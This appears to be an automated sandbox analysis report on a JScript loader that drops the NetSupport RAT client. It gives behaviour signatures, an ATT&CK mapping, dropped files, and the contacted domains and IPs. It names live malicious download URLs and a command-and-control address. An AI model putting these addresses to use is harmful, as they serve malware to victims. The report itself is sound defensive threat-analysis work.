                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1111DDC0 GetVersionExA,GetModuleFileNameA,wsprintfA,WinExec,Sleep,wsprintfA,CreateNamedPipeA,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,CreateEventA,GetModuleHandleA,GetProcAddress,CloseHandle,4_2_1111DDC0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110A1460 GetLocalTime,4_2_110A1460
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11147160 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,4_2_11147160
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1117594C ____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,4_2_1117594C
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_strncpy,RegCloseKey,4_2_11145C70
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_6C60A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,4_2_6C60A980
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,5_2_11070430
                                Source: Yara matchFile source: 5.0.client32.exe.c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.client32.exe.6f8f0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.6fbd0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.6fbd0000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.6f8f0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.6f8f0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.client32.exe.6fbd0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.client32.exe.c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.0.client32.exe.c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.client32.exe.c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.6c600000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000006.00000002.2265922513.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3004861029.0000000000C32000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000000.2262484311.0000000000C32000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.2183097774.0000000000C32000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.2143718322.0000000000C32000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.2183914163.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2265331091.0000000000C32000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2265885595.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000000.2180719969.0000000000C32000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.2183988529.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\4dvs23l\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\4dvs23l\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\4dvs23l\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\4dvs23l\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\4dvs23l\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\4dvs23l\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information2
                                Scripting                                		2
                                Valid Accounts                                		1
                                Windows Management Instrumentation                                		2
                                Scripting                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		1
                                Input Capture                                		12
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		3
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts5
                                Native API                                		1
                                DLL Side-Loading                                		2
                                Valid Accounts                                		4
                                Obfuscated Files or Information                                		LSASS Memory1
                                Account Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		21
                                Encrypted Channel                                		Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution                                		2
                                Valid Accounts                                		21
                                Access Token Manipulation                                		1
                                Software Packing                                		Security Account Manager1
                                System Service Discovery                                		SMB/Windows Admin Shares1
                                Input Capture                                		4
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                Service Execution                                		1
                                Windows Service                                		1
                                Windows Service                                		1
                                DLL Side-Loading                                		NTDS3
                                File and Directory Discovery                                		Distributed Component Object Model3
                                Clipboard Data                                		15
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd1
                                Registry Run Keys / Startup Folder                                		113
                                Process Injection                                		1
                                File Deletion                                		LSA Secrets35
                                System Information Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                                Registry Run Keys / Startup Folder                                		1
                                Masquerading                                		Cached Domain Credentials251
                                Security Software Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                                Valid Accounts                                		DCSync2
                                Virtualization/Sandbox Evasion                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                                Virtualization/Sandbox Evasion                                		Proc Filesystem1
                                Process Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                Access Token Manipulation                                		/etc/passwd and /etc/shadow11
                                Application Window Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron113
                                Process Injection                                		Network Sniffing1
                                System Owner/User Discovery                                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576919 Sample: 5j0fix05fy.js Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 32 depostsolo.biz 2->32 34 businessinsanjose.info 2->34 36 geo.netsupportsoftware.com 2->36 48 Suricata IDS alerts for network traffic 2->48 50 Antivirus detection for URL or domain 2->50 52 Multi AV Scanner detection for dropped file 2->52 54 2 other signatures 2->54 7 wscript.exe 3 38 2->7         started        12 client32.exe 2->12         started        14 client32.exe 2->14         started        signatures3 process4 dnsIp5 38 depostsolo.biz 98.142.240.215, 443, 49731, 49738 VELCOMCA Canada 7->38 20 C:\ProgramData\...\ie_to_edge_bho_64.dll, PE32+ 7->20 dropped 22 C:\ProgramData\4dvs23l\...\ie_to_edge_bho.dll, PE32 7->22 dropped 24 C:\ProgramData\4dvs23l\remcmdstub.exe, PE32 7->24 dropped 26 7 other files (6 malicious) 7->26 dropped 56 System process connects to network (likely due to code injection or exploit) 7->56 58 Benign windows process drops PE files 7->58 60 Deletes itself after installation 7->60 62 Windows Scripting host queries suspicious COM object (likely to drop second stage) 7->62 16 client32.exe 16 7->16         started        file6 signatures7 process8 dnsIp9 28 194.180.191.64, 443, 49739 MIVOCLOUDMD unknown 16->28 30 geo.netsupportsoftware.com 104.26.0.231, 49740, 49741, 49742 CLOUDFLARENETUS United States 16->30 40 Multi AV Scanner detection for dropped file 16->40 42 Contains functionalty to change the wallpaper 16->42 44 Delayed program exit found 16->44 46 Contains functionality to detect sleep reduction / modifications 16->46 signatures10

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                5j0fix05fy.js11%ReversingLabsScript-JS.Trojan.NetSupportRAT

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\ProgramData\4dvs23l\HTCTL32.DLL13%ReversingLabsWin32.Trojan.Generic
                                C:\ProgramData\4dvs23l\PCICHEK.DLL5%ReversingLabs
                                C:\ProgramData\4dvs23l\PCICL32.DLL17%ReversingLabs
                                C:\ProgramData\4dvs23l\TCCTL32.DLL6%ReversingLabs
                                C:\ProgramData\4dvs23l\client32.exe27%ReversingLabsWin32.Trojan.NetSupport
                                C:\ProgramData\4dvs23l\msvcr100.dll0%ReversingLabs
                                C:\ProgramData\4dvs23l\pcicapi.dll3%ReversingLabs
                                C:\ProgramData\4dvs23l\remcmdstub.exe29%ReversingLabsWin32.Trojan.Generic
                                C:\ProgramData\4dvs23l\temp\ie_to_edge_bho.dll0%ReversingLabs
                                C:\ProgramData\4dvs23l\temp\ie_to_edge_bho_64.dll0%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://cloudfront.amazonaw(Y0%Avira URL Cloudsafe
                                http://cloudfront.amazonaws.com/doc/2020-05-31/0%Avira URL Cloudsafe
                                http://sns.amazonaws.com/doc/2010-03-31/0%Avira URL Cloudsafe
                                http://cloudfront.amazonaws.com/doc/2017-03-25/0%Avira URL Cloudsafe
                                https://jsbench.me/2vkpcekkvw/1)0%Avira URL Cloudsafe
                                http://%s/testpage.htm0%Avira URL Cloudsafe
                                https://jsperf.com/try-catch-performance-overhead0%Avira URL Cloudsafe
                                http://s3.amazonaws.com/doc/2006-03-01/0%Avira URL Cloudsafe
                                http://cloudfront.amazonaws(Y0%Avira URL Cloudsafe
                                http://cloudfront.amazonaws.com/doc/2018-06-18/0%Avira URL Cloudsafe
                                http://elasticloadbalancing.amazonaws.com/doc/2012-06-01/0%Avira URL Cloudsafe
                                http://cloudfront.am(Y0%Avira URL Cloudsafe
                                http://monitoring.amazonaws.com/doc/2010-08-01/0%Avira URL Cloudsafe
                                https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight0%Avira URL Cloudsafe
                                http://pajhome.org.uk/crypt/md50%Avira URL Cloudsafe
                                http://%s/fakeurl.htm0%Avira URL Cloudsafe
                                https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).0%Avira URL Cloudsafe
                                https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf0%Avira URL Cloudsafe
                                http://docs.amazonwebservices.com/general/latest/gr/rande.html0%Avira URL Cloudsafe
                                http://cloudfront.amazonaws.com/doc/2018-11-05/0%Avira URL Cloudsafe
                                http://cloudformation.amazonaws.com/doc/2010-05-15/0%Avira URL Cloudsafe
                                http://www.movable-type.co.uk/scripts/sha1.html0%Avira URL Cloudsafe
                                https://depostsolo.biz/work/download.php?id=100&76794100%Avira URL Cloudmalware
                                http://cloudfront.amazonaws.com/doc/2016-11-25/0%Avira URL Cloudsafe
                                http://194.180.191.64/fakeurl.htm100%Avira URL Cloudmalware
                                http://elasticache.amazonaws.com/doc/2015-02-02/0%Avira URL Cloudsafe
                                http://cloudfront.amazonaws.com/doc/2017-10-30/0%Avira URL Cloudsafe
                                https://businessinsanjose.info/work/yyy.zip?8982100%Avira URL Cloudmalware
                                http://elasticloadbalancing.amazonaws.com/doc/2015-12-01/0%Avira URL Cloudsafe
                                http://0.30000000000000004.com/0%Avira URL Cloudsafe
                                http://cloudfront.amazonaws.com/doc/2019-03-26/0%Avira URL Cloudsafe
                                https://bugs.chromium.org/p/v8/issues/detail?id=3175#c40%Avira URL Cloudsafe
                                https://depostsolo.biz/100%Avira URL Cloudmalware
                                http://jsperf.com/call-apply-segu0%Avira URL Cloudsafe
                                http://autoscaling.amazonaws.com/doc/2011-01-01/0%Avira URL Cloudsafe
                                http://elasticbeanstalk.amazonaws.com/docs/2010-12-01/0%Avira URL Cloudsafe
                                http://ses.amazonaws.com/doc/2010-12-01/0%Avira URL Cloudsafe
                                http://cloudfront.amazon(Y0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                businessinsanjose.info
                                		98.142.240.215
                                		truetrue
                                  		unknown
                                  geo.netsupportsoftware.com
                                  		104.26.0.231
                                  		truefalse
                                    		high
                                    depostsolo.biz
                                    		98.142.240.215
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://geo.netsupportsoftware.com/location/loca.aspfalse
                                        		high
                                        https://depostsolo.biz/work/download.php?id=100&76794true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://194.180.191.64/fakeurl.htmtrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://businessinsanjose.info/work/yyy.zip?8982true
                                        • Avira URL Cloud: malware
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://github.com/apache/incubator-echarts/issues/11369wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://cloudfront.amazonaws.com/doc/2020-05-31/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://rds.amazonaws.com/doc/2014-09-01/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/LiosK/UUID.jswscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://cloudfront.amazonaws.com/doc/2017-03-25/wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://rds.amazonaws.com/doc/2013-09-09/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/feross/buffer/pull/97wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://cloudfront.amazonaws.com/doc/2018-06-18/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://github.com/blueimp/JavaScript-MD5wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://opensource.org/licenses/MITwscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.jswscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://a.co/7PzMCcywscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://github.com/isaacs/node-lru-cachewscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://jsperf.com/try-catch-performance-overheadwscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://cloudfront.amazonaw(Ywscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://jsbench.me/2vkpcekkvw/1)wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://%s/testpage.htmclient32.exefalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://s3.amazonaws.com/doc/2006-03-01/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://cloudfront.amazonaws(Ywscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://rds.amazonaws.com/doc/2013-01-10/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://sns.amazonaws.com/doc/2010-03-31/wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://github.com/aws/aws-sdk-js/issues/2304)wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://docs.python.org/library/uuid.htmlwscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://elasticloadbalancing.amazonaws.com/doc/2012-06-01/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://cloudfront.am(Ywscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.jswscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://aws.amazon.com/apache2.0/wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://%s/fakeurl.htmclient32.exefalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-HTTPPOSTConstructPolicy.htmlwscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://github.com/apache/incubator-echarts/issues/12229wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.jswscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://rds.amazonaws.com/doc/2014-10-31/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flightwscript.exe, 00000000.00000003.1723178587.000001AC402B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721435455.000001AC3F69A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://monitoring.amazonaws.com/doc/2010-08-01/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://stackoverflow.com/a/22747272/680742wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://redshift.amazonaws.com/doc/2012-12-01/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://bugzilla.mozilla.org/show_bug.cgi?id=695438.wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://pajhome.org.uk/crypt/md5wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdfwscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://docs.amazonwebservices.com/general/latest/gr/rande.htmlwscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://docs.aws.amazon.com/amazondynamodb/latest/developerguide/DataModel.html#DataModel.DataTypes).wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://mths.be/punycodewscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://tools.ietf.org/html/rfc1123#section-2wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://nodejs.org/dist/latest/docs/api/stream.html#stream_object_modewscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://cloudfront.amazonaws.com/doc/2018-11-05/wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://cloudformation.amazonaws.com/doc/2010-05-15/wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://ec2.ap-southeast-1.amazonaws.comwscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.jswscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.movable-type.co.uk/scripts/sha1.htmlwscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://route53.amazonaws.com/doc/2(Ywscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://cloudfront.amazonaws.com/doc/2016-11-25/wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
